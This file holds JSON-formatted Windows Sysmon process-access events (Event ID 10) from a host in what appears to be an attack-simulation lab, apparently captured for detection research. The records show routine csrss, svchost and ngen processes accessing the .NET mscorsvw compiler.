{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00101D8B0B00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00101D8B0B00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.481\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00101D8B0B00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.481","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00101D8B0B00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.513\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001073910B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.513","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001073910B00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-001073910B00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-001073910B00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.528\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E00A0D00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.528","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E00A0D00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.622\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.622","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.622\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.622","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.622\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132C-5F25-0000-00104C8E0B00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.622","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132C-5F25-0000-00104C8E0B00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
